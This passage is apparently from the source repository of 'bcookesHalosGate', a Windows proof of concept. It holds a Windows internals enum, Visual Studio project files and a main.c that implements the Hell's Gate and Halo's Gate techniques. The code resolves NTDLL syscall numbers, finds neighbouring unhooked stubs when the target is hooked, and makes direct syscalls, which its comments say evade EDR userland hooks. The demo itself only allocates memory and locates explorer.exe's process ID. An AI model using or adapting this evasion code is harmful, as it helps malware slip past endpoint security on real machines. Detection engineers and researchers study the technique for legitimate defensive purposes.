ObQueryRefTraceInformation\r\n\tSystemSpecialPoolInformation, // q; s (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0\r\n\tSystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION\r\n\tSystemErrorPortInformation, // s (requires SeTcbPrivilege)\r\n\tSystemBootEnvironmentInformation, // 90, q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION\r\n\tSystemHypervisorInformation, // q; s (kernel-mode only)\r\n\tSystemVerifierInformationEx, // q; s\r\n\tSystemTimeZoneInformation, // s (requires SeTimeZonePrivilege)\r\n\tSystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)\r\n\tSystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation\r\n\tSystemPrefetchPatchInformation, // not implemented\r\n\tSystemVerifierFaultsInformation, // s (requires SeDebugPrivilege)\r\n\tSystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION\r\n\tSystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION\r\n\tSystemProcessorPerformanceDistribution, // 100, q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION\r\n\tSystemNumaProximityNodeInformation, // q\r\n\tSystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege)\r\n\tSystemCodeIntegrityInformation, // q // SeCodeIntegrityQueryInformation\r\n\tSystemProcessorMicrocodeUpdateInformation, // s\r\n\tSystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23\r\n\tSystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation\r\n\tSystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // since WIN7 // KeQueryLogicalProcessorRelationship\r\n\tSystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[]\r\n\tSystemStoreInformation, // q; s // SmQueryStoreInformation\r\n\tSystemRegistryAppendString, // 110, s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS\r\n\tSystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege)\r\n\tSystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION\r\n\tSystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation\r\n\tSystemNativeBasicInformation, // not implemented\r\n\tSystemSpare1, // not implemented\r\n\tSystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION\r\n\tSystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation\r\n\tSystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION\r\n\tSystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)\r\n\tSystemSystemPtesInformationEx, // 120, q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes)\r\n\tSystemNodeDistanceInformation, // q\r\n\tSystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26\r\n\tSystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation\r\n\tSystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1\r\n\tSystemSessionBigPoolInformation, // since WIN8\r\n\tSystemBootGraphicsInformation,\r\n\tSystemScrubPhysicalMemoryInformation,\r\n\tSystemBadPageInformation,\r\n\tSystemProcessorProfileControlArea,\r\n\tSystemCombinePhysicalMemoryInformation, // 130\r\n\tSystemEntropyInterruptTimingCallback,\r\n\tSystemConsoleInformation,\r\n\tSystemPlatformBinaryInformation,\r\n\tSystemThrottleNotificationInformation,\r\n\tSystemHypervisorProcessorCountInformation,\r\n\tSystemDeviceDataInformation,\r\n\tSystemDeviceDataEnumerationInformation,\r\n\tSystemMemoryTopologyInformation,\r\n\tSystemMemoryChannelInformation,\r\n\tSystemBootLogoInformation, // 140\r\n\tSystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE\r\n\tSystemSpare0,\r\n\tSystemSecureBootPolicyInformation,\r\n\tSystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX\r\n\tSystemSecureBootInformation,\r\n\tSystemEntropyInterruptTimingRawInformation,\r\n\tSystemPortableWorkspaceEfiLauncherInformation,\r\n\tSystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)\r\n\tSystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX\r\n\tSystemBootMetadataInformation, // 150\r\n\tSystemSoftRebootInformation,\r\n\tSystemElamCertificateInformation,\r\n\tSystemOfflineDumpConfigInformation,\r\n\tSystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION\r\n\tSystemRegistryReconciliationInformation,\r\n\tSystemEdidInformation,\r\n\tSystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD\r\n\tSystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION\r\n\tSystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION\r\n\tSystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160\r\n\tSystemVmGenerationCountInformation,\r\n\tSystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION\r\n\tSystemKernelDebuggerFlags,\r\n\tSystemCodeIntegrityPolicyInformation,\r\n\tSystemIsolatedUserModeInformation,\r\n\tSystemHardwareSecurityTestInterfaceResultsInformation,\r\n\tSystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION\r\n\tSystemAllowedCpuSetsInformation,\r\n\tSystemDmaProtectionInformation,\r\n\tSystemInterruptCpuSetsInformation,\r\n\tSystemSecureBootPolicyFullInformation,\r\n\tSystemCodeIntegrityPolicyFullInformation,\r\n\tSystemAffinitizedInterruptProcessorInformation,\r\n\tSystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION\r\n\tMaxSystemInfoClass\r\n} SYSTEM_INFORMATION_CLASS;" }, { "path": "bcookesHalosGate.sln", "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30114.105\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"bcookesHalosGate\", \"bcookesHalosGate.vcxproj\", \"{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}\r\n\tEndGlobalSection\r\nEndGlobal\r\n" }, { "path": "bcookesHalosGate.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n Win32Proj\r\n {dc6187cb-d5df-4973-84a2-f92aae90cda9}\r\n bcookesHalosGate\r\n 10.0\r\n bcookesHalosGate\r\n \r\n \r\n \r\n Application\r\n true\r\n v142\r\n Unicode\r\n false\r\n \r\n \r\n Application\r\n false\r\n v142\r\n true\r\n Unicode\r\n false\r\n \r\n \r\n Application\r\n true\r\n v142\r\n Unicode\r\n false\r\n \r\n \r\n Application\r\n false\r\n v142\r\n false\r\n Unicode\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n \r\n Level3\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n Disabled\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n Document\r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "bcookesHalosGate.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Header Files\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n" }, { "path": "bcookesHalosGate.vcxproj.user", "content": "\r\n\r\n \r\n" }, { "path": "main.c", "content": "/*\r\nAuthor: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/\r\nCredits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique)\r\n*/\r\n#include \r\n#include \"bcookesHalosGate.h\"\r\n#include \r\n\r\nextern VOID HellsGate(WORD wSystemCall);\r\nextern HellDescent();\r\n\r\nEXTERN_C PVOID getntdll();\r\n\r\nEXTERN_C PVOID getExportTable(\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExAddressTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExNamePointerTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getExOrdinalTable(\r\n\tIN PVOID moduleExportTableAddr,\r\n\tIN PVOID moduleAddr\r\n);\r\n\r\nEXTERN_C PVOID getApiAddr(\r\n\tIN DWORD apiNameStringLen,\r\n\tIN LPSTR apiNameString,\r\n\tIN PVOID moduleAddr,\r\n\tIN PVOID ExExAddressTable,\r\n\tIN PVOID ExNamePointerTable,\r\n\tIN PVOID ExOrdinalTable\r\n);\r\n\r\nEXTERN_C DWORD findSyscallNumber(\r\n\tIN PVOID ntdllApiAddr\r\n);\r\n\r\nEXTERN_C DWORD halosGate(\r\n\tIN PVOID ntdllApiAddr,\r\n\tIN WORD index\r\n);\r\n\r\nEXTERN_C DWORD compExplorer(\r\n\tIN PVOID explorerWString\r\n);\r\n\r\nPVOID ntdll = NULL;\r\nPVOID ntdllExportTable = NULL;\r\n\r\nPVOID ntdllExAddrTbl = NULL;\r\nPVOID ntdllExNamePtrTbl = NULL;\r\nPVOID ntdllExOrdinalTbl = NULL;\r\n\r\nconst char ntQrySysInfoStr[] = \"NtQuerySystemInformation\";\r\nDWORD ntQrySysInfoStrLen = 0;\r\nPVOID ntQrySysInfoAddr = NULL;\r\nDWORD ntQrySysInfoSyscallNumber = 0;\r\n\r\nconst char ntAllocVMStr[] = \"NtAllocateVirtualMemory\";\r\nDWORD ntAllocVMStrLen = 0;\r\nPVOID ntAllocVMAddr = NULL;\r\nDWORD ntAllocVMSyscallNumber = 0;\r\n\r\nSYSTEM_PROCESS_INFORMATION* procinfo;\r\n\r\nvoid main() {\r\n\tprintf(\"###################################################################\\r\\n\");\r\n\t// Use Position Independent Shellcode to resolve the address of NTDLL and its export tables\r\n\tntdll = getntdll();\r\n\tprintf(\"[+] %p : NTDLL Base Address\\r\\n\", ntdll);\r\n\r\n\tntdllExportTable = getExportTable(ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Table Address\\r\\n\", ntdllExportTable);\r\n\r\n\tntdllExAddrTbl = getExAddressTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Address Table Address\\r\\n\", ntdllExAddrTbl);\r\n\r\n\tntdllExNamePtrTbl = getExNamePointerTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Name Pointer Table Address\\r\\n\", ntdllExNamePtrTbl);\r\n\r\n\tntdllExOrdinalTbl = getExOrdinalTable(ntdllExportTable, ntdll);\r\n\tprintf(\"[+] %p : NTDLL Export Ordinal Table Address\\r\\n\", ntdllExOrdinalTbl);\r\n\tprintf(\"###################################################################\\r\\n\\r\\n\");\r\n\t// Find the address of NTDLL.NtQuerySystemInformation by looping through NTDLL export tables\r\n\tntQrySysInfoStrLen = sizeof(ntQrySysInfoStr);\r\n\tprintf(\"[-] Looping through NTDLL Export tables to discover the address for NTDLL.%s..\\r\\n\", ntQrySysInfoStr);\r\n\tntQrySysInfoAddr = getApiAddr(\r\n\t\tntQrySysInfoStrLen,\r\n\t\tntQrySysInfoStr,\r\n\t\tntdll,\r\n\t\tntdllExAddrTbl,\r\n\t\tntdllExNamePtrTbl,\r\n\t\tntdllExOrdinalTbl\r\n\t);\r\n\tprintf(\"[+] %p : NTDLL.%s Address\\r\\n\\r\\n\", ntQrySysInfoAddr, ntQrySysInfoStr);\r\n\tprintf(\"[-] Using HellsGate technique to discover syscall for %s..\\r\\n\", ntQrySysInfoStr);\r\n\t// HellsGate technique to recover the systemcall number\r\n\tntQrySysInfoSyscallNumber = findSyscallNumber(ntQrySysInfoAddr);\r\n\t// HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks\r\n\tif (ntQrySysInfoSyscallNumber == 0) {\r\n\t\tprintf(\"[!] Failed to discover the syscall number for %s. The API is likely hooked by EDR\\r\\n\", ntQrySysInfoStr);\r\n\t\tprintf(\"[-] Using HalosGate technique to discover syscall for %s..\\r\\n\", ntQrySysInfoStr);\r\n\t\tDWORD index = 0;\r\n\t\twhile (ntQrySysInfoSyscallNumber == 0) {\r\n\t\t\tindex++;\r\n\t\t\t// Check for unhooked Sycall Above the target stub\r\n\t\t\tntQrySysInfoSyscallNumber = halosGateUp(ntQrySysInfoAddr, index);\r\n\t\t\tif (ntQrySysInfoSyscallNumber) {\r\n\t\t\t\tntQrySysInfoSyscallNumber = ntQrySysInfoSyscallNumber - index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t// Check for unhooked Sycall Below the target stub\r\n\t\t\tntQrySysInfoSyscallNumber = halosGateDown(ntQrySysInfoAddr, index);\r\n\t\t\tif (ntQrySysInfoSyscallNumber) {\r\n\t\t\t\tntQrySysInfoSyscallNumber = ntQrySysInfoSyscallNumber + index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tprintf(\"[+] %x : Syscall number for NTDLL.%s\\r\\n\\r\\n\", ntQrySysInfoSyscallNumber, ntQrySysInfoStr);\r\n\r\n\t// Find the address of NTDLL.NtAllocateVirtualMemory by looping through NTDLL export tables\r\n\tntAllocVMStrLen = sizeof(ntAllocVMStr);\r\n\tntAllocVMAddr = getApiAddr(\r\n\t\tntAllocVMStrLen,\r\n\t\tntAllocVMStr,\r\n\t\tntdll,\r\n\t\tntdllExAddrTbl,\r\n\t\tntdllExNamePtrTbl,\r\n\t\tntdllExOrdinalTbl\r\n\t);\r\n\tprintf(\"[+] %p : NTDLL.%s Address\\r\\n\", ntAllocVMAddr, ntAllocVMStr);\r\n\tprintf(\"[-] Using HellsGate technique to discover syscall for %s..\\r\\n\", ntAllocVMStr);\r\n\t// HellsGate technique to recover the systemcall number\r\n\tntAllocVMSyscallNumber = findSyscallNumber(ntAllocVMAddr);\r\n\t// HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks\r\n\tif (ntAllocVMSyscallNumber == 0) {\r\n\t\tprintf(\"[!] Failed to discover the syscall number for %s. The API is likely hooked by EDR\\r\\n\", ntAllocVMStr);\r\n\t\tprintf(\"[-] Using HalosGate technique to discover syscall for %s..\\r\\n\", ntAllocVMStr);\r\n\t\tDWORD index = 0;\r\n\t\twhile (ntAllocVMSyscallNumber == 0) {\r\n\t\t\tindex++;\r\n\t\t\t// Check for unhooked Sycall Above the target stub\r\n\t\t\tntAllocVMSyscallNumber = halosGateUp(ntAllocVMAddr, index);\r\n\t\t\tif (ntAllocVMSyscallNumber) {\r\n\t\t\t\tntAllocVMSyscallNumber = ntAllocVMSyscallNumber - index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t// Check for unhooked Sycall Below the target stub\r\n\t\t\tntAllocVMSyscallNumber = halosGateDown(ntAllocVMAddr, index);\r\n\t\t\tif (ntAllocVMSyscallNumber) {\r\n\t\t\t\tntAllocVMSyscallNumber = ntAllocVMSyscallNumber + index;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tprintf(\"[+] %x : Syscall number for NTDLL.%s\\r\\n\\r\\n\", ntAllocVMSyscallNumber, ntAllocVMStr);\r\n\r\n\t// Allocate the buffer for the process information returned from NtQuerySystemInformation\r\n\tULONG size = 1 << 18;\r\n\tPVOID base_addr = NULL;\r\n\tSIZE_T buffSize1 = (SIZE_T)size;\r\n\tULONG required = 0;\r\n\r\n\t// NtAllocateVirtualMemory\r\n\tHellsGate(ntAllocVMSyscallNumber);\r\n\tHellDescent((HANDLE)-1, &base_addr, 0, &buffSize1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\r\n\t// NtQuerySystemInformation\r\n\tHellsGate(ntQrySysInfoSyscallNumber);\r\n\r\n\tNTSTATUS status = HellDescent(SystemProcessInformation, base_addr, size, &required);\r\n\r\n\tif (status == STATUS_BUFFER_TOO_SMALL) {\r\n\t\tsize = required + (1 << 14);\r\n\t\tSIZE_T buffSize2 = size;\r\n\t\t// NtAllocateVirtualMemory\r\n\t\tHellsGate(ntAllocVMSyscallNumber);\r\n\t\tHellDescent((HANDLE)-1, &base_addr, 0, &buffSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\t}\r\n\r\n\tNTSTATUS status2 = HellDescent(SystemProcessInformation, base_addr, size, &required);\r\n\r\n\tprocinfo = (SYSTEM_PROCESS_INFORMATION*)base_addr;\r\n\twhile (TRUE) {\r\n\t\tBOOL check = compExplorer(procinfo->ImageName.Buffer);\r\n\t\tif (check == 1) {\r\n\t\t\tprintf(\"%ws | PID: %6u | PPID: %6u\\n\",\r\n\t\t\t\tprocinfo->ImageName.Buffer,\r\n\t\t\t\tHandleToULong(procinfo->UniqueProcessId),\r\n\t\t\t\tHandleToULong(procinfo->InheritedFromUniqueProcessId)\r\n\t\t\t);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tprocinfo = (SYSTEM_PROCESS_INFORMATION*)((BYTE*)procinfo + procinfo->NextEntryOffset);\r\n\t}\r\n\treturn;\r\n}" } ]